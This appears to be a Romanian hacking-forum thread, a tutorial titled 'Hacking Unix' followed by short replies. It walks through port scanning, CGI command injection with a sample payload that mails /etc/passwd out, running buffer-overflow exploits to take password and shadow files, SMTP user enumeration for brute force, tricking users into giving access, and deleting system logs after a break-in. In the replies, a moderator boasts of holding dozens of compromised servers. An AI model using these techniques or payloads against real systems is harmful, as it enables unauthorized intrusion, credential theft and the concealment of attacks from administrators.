HackStuff...
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe , tutoriale etc. In acelasi timp veti avea si asistenta help . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile savarsite.ENJoY --- by andreony ---
|
Lista Forumurilor Pe Tematici
|
HackStuff... | Reguli | Inregistrare | Login
POZE HACKSTUFF...
Nu sunteti logat.
|
Nou pe simpatie: Lolalola 23 ani
 | Femeie 23 ani Cluj cauta Barbat 26 - 80 ani |
|
andreony
[admin]
 Din: bucharest
Inregistrat: acum 19 ani
Postari: 1062
|
|
Hacking Unix
Inainte de a prezenta principalele tehnici de hack a SO Unix va trebui sa cititi ghidul de instalare Linux.Apoi ca sa va familiarizati cu comenzile linux..Acum putem intra in amanunte.
a)FTP
Dupa cum probabil cunoasteti deja ftp este un program cu ajutorul caruia puteti transfera fisiere intre calculatorul dumneavoastra si server.Acest utilitar este foarte folositor in momentul cand avem un cont local pe un anumit server sau cand serverul permite comexiuni anonime folosind perechile username:parola urmatoare annonymous:adresa_de mail sau ftp:guest.O conexiune ftp se poate stabili tastand 'ftp server.com' in casuta Start/Run,unde server. com este serverul la care doriti sa va conectati.In cazul unui atac efectiv asupra unui server,ftp-ul este folosit in combinatie cu telnetul.
b)TELNET
Telnetul este un utilitar care ne permite sa ne conectam la orice port deschis de pe un server si sa dam comenzi daemonului care asculta pe acel port.Mai jos o sa dau o lista cu porturile si serviciile cele mai frecvent utilizate:
port 21: ftp port 22: SSH
port 23: telnet
port 25: SMTP
port 110: POP3
port 80: server web
port 111: NFS(Network File System)
port 139: SMB(Server Message Block)
port 6667: IRC(Internet Relay Chat)
Evident,fiecare daemon are un numar limitat de comenzi.Spre exemplu daca portul 23 este deschis,atunci daemonul telnet este activ si putem realiza o conexiune pe acel port numai daca avem drept de utilizator pe acel server.Dupa ce conexiunea este stabilita putem da comenzi unix pe server.Putem folosi acest lucru pentru a obtine controlul pe serverul respectiv.Cititi acest material pentru a vedea care sunt principalele tehnici si exploituri.Daca portul 80 este deschis atunci ne putem conecta pe acel port iar cand conexiunea este stabilita putem da comanda GET index.html.Ca raspuns vom primi pagina principala.Daca nu aveti posibilitatea sa instalati linux pe calculatorul personal atunci puteti folosi un shell acount,adica un cont unix pus la dispozitie de un furnizor de astfel de servicii. Aici puteti gasi unul.
c)PORT SCANNING
Pentru a vedea ce servicii ruleaza pe un server se foloseste scanarea porturilor.Astfel de programe se numesc scannere.Unele scannere sunt foarte complexe,acestea verificand si vulnerabilitatile cunoscute. Scannerele sunt concepute pentru diferite sisteme de operare.Pentru Windows: fscan,portscan,IIS scanner,Cerberus.Pentru Unix: SATAN, Strobe,Jakal,etc.Pentru scanarea porturilor eu folosesc JAKAL deoarece este invizibil adica nu lasa nici o urma de conexiune in log-uri.Ca scanner de vulnerabilitati folosesc SATAN.Verificati sectiunea LINKURI pentru a vedea unde puteti gasi aceste scannere.
d)CGI SCANNING
Atacurile asupra CGI sunt foarte populare si 65% dintre ele sunt incununate de succes.In prezent exista peste 500 de vulnerabilitati cunoscute.Un scanner foarte bun este Cgifound.exe.O sa dau un mic exemplu ca sa intelegeti despre ce este vorba.De exemplu daca pe un server NT exista fisierul /test/test.cgi puteti afla calea fizica a serverului folosind urmatorul link:www.server.com/cgi-bin/test/test. cgi.Daca vreti mai multe detalii cititi aici.Sa presupunem ca sunteti administrator de retea si trebuie sa scrieti un script pentru un motor de cautare pentru site-ul dvs.Un exemplu foarte simplu este urmatorul :
--------------------------------------------------------------
#/bin/bash
$a=grep $valoare_introdusa /usl/local/fisier.txt
echo $a fis.txt
cat fis.txt
rm fis.txt
--------------------------------------------------------------
Valoare_introdusa este valoarea introdusa de utilizator.Acesta este cautata intr-un anumit fisier stabilit dinainte cu inregistrari, toate referirile la ea sunt stocate in fis.txt,sunt afisate pe ecran iar apoi fis.txt este sters.Toate bune daca utilizatorul este de buna credinta.El poate introduce urmatorul sir:
blabla;mail </etc/passwd
Acest sir are ca efect cautarea sirului blabla in fisier iar apoi trimiterea la adresa mea a fisierului /etc/passwd.Asta deoarece unixul accepta executia de comenzi una dupa alta folosind metacaractere.De exemplu:
grep root /etc/passwd;echo a doua comanda;ls -ld /tmp;rlogin -l username hostname
Toate aceste comenzi sunt executate una dupa alta.Sper ca v-ati facut o mica idee despre ce inseamna vulnerabilitatea in CGI.Va recomand niste scannere cum ar fi Cgifound.exe si cgiS.c
e)BUFFER OVERFLOW
Ce inseamna de fapt buffer overflow?Umplerea unei zone de memorie alocata unor anumiti operanzi,operatori,instructiuni sau date.Cum se foloseste aceasta tehnica la obtinerea controlului asupra unui server?Serverul preia niste date de la utilizator si le executa.De exemplu GET cgi-bin/file.pl este o instructiune pe care noi o transmitem iar serverul o executa.Daca nu este specificat in codul sursa controlul asupra dimensiunii instructiunii respective,atunci datele care sunt in plus se executa aleator(ele sunt interpretate ca instructiuni).Aceste tipuri de exploturi sunt de obicei programe in C pe care le compilam pe masina noastra unix cu comanda 'gcc fisier.c -o fisierexecuatbil' si apoi il rulam cu parametrii stabiliti. Daca sunteti buni programatori in C puteti adapta programul respectiv sa ruleze in Windows.Tehnica este extrem de folositoare deoarece in majoritatea cazurilor nu puteti obtine controlul cu ajutorul tehnicilor obisnuite.Cum gasiti astfel de programe?Tastati in browser adresa unei liste de securitate,de exemplu iar apoi intorduceti in caseta de text(motor de cautare) versiunea serverului care va intereseaza.De exemplu eu a trebuit sa testez recent vulnerabilitatea unui sistem pe care rula ProFtpd 1.2.0,asa ca am introdus in motorul de cautare 'proftpd' si am gasit un astfel de exploit care odata compilat pe o platforma FreeBSD si rulat cu parametrii corespunzatori permitea unui atacator sa incarce fisierele /etc/passwd si /etc/shadow ducand astfel la compromiterea sistemului. Desigur,abonarea la o lista de securitate e o idee buna atat pentru un administrator cat si pentru un hacker.
f)BRUTE FORCE
Aceasta tehnica este folositoare in cazul in care obtinem o lista cu toti utilizatorii.Se stie ca multi utilizatori au aceeasi parola ca si username-ul.Sau unele parole sunt de genul username100 sau username urmat de un numar.La inceput si eu foloseam asemenea parole :).Prima mea parola era nebunu45.Cel mai bun program de brute force pentru Windows este Brutus.exe.Verificati sectiunea de linkuri.Am facut un program care se conecta pe portul 25 al unui server si lua prin brute force toti userii.Ia incercati o conexiune telnet pe portul 25 al unui server de mail si dati urmatoarele comenzi:
helo mail mail from:webmaster rcpt to:adresa_ta data urmeaza textul mesajului . quit
Daca adresa introdusa la "rcpt to" era corecta primeati un raspuns de genul "Recipient Ok",daca nu primeati ceva de genul "User unknown". Faceti un program care sa citeasca raspunsul serverului folosind un fisier de useri.Hackul implica inventivitate si imaginatie, iar tehnicile folosite difera de la caz la caz,de la server la server.
g)Recapitulare
Voi prezenta principalele etape pe care trebuie sa le parcurgeti pentru a obtine controlul asupra unui server sub UNIX:
1)adunati informatii (versiuni de server web,ftp,telnet,sendmail,etc) cu ajutorul telnetului si a unui program de scanare a porturilor
2)scanati bug-urile in CGI,bineinteles dupa ce verificati ca exista directorul cgi-bin pe server.:)
3)incercati toate exploiturile cunoscute pentru cazul respectiv si pentu versiunile de servicii care ruleaza pe porturile deschise.
4)Daca nimic nu merge,incercati sa obtineti un cont local,eventual pacalind un utilizator sa va dea acces.Astfel puteti verifica mai indeaproape serverul.
5)Dupa ce obtineti controlul stergeti toate jurnalele.De exemplu puteti sterge /var/adm/messages si/sau /usr/local/httpd/logs.Am dat un exemplu,acestea difera in functie de SO folosit.
_______________________________________ ------ eVoLuTiOn ------
|
|
pus acum 18 ani |
|
CuTe
moderator
 Inregistrat: acum 18 ani
Postari: 14
|
|
adevaru`i ca ejti bun .. )
_______________________________________ teh fuxin` Rider 
|
|
pus acum 18 ani |
|
andreony
[admin]
 Din: bucharest
Inregistrat: acum 19 ani
Postari: 1062
|
|
taci ma .u mai ai ceva de scan?vreun sunos ceva 
_______________________________________ ------ eVoLuTiOn ------
|
|
pus acum 18 ani |
|
CuTe
moderator
 Inregistrat: acum 18 ani
Postari: 14
|
|
mda .. m`am cam lasat .. am "cateva" linuxuri pe viata lor si vreo 30 sau 40 de sunosuri .. am de ajuns pana la 80 de ani 
_______________________________________ teh fuxin` Rider 
|
|
pus acum 18 ani |
|
CuTe
moderator
 Inregistrat: acum 18 ani
Postari: 14
|
|
sa ma mai uit oleak pe forumu` asta al tau ... ca vad ca zici chestii pe care nu arati cum se face . poate o sa iti arat eu 
_______________________________________ teh fuxin` Rider 
|
|
pus acum 18 ani |
|